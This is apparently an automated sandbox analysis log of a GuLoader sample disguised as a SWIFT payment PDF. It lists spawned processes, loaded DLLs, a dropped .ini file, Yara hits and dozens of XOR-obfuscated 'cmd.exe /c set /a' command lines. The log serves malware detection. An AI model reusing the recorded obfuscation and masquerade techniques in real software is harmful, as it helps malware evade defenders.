          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile written: C:\Windows\Resources\0409\gashanens.iniJump to behavior

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000006.00000002.134275655794.00000000085F6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.134274135976.0000000000863000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.134274135976.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SWIFTCOPYMT1030000000_pdf.exe PID: 1976, type: MEMORYSTR
          Obfuscated command line found
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
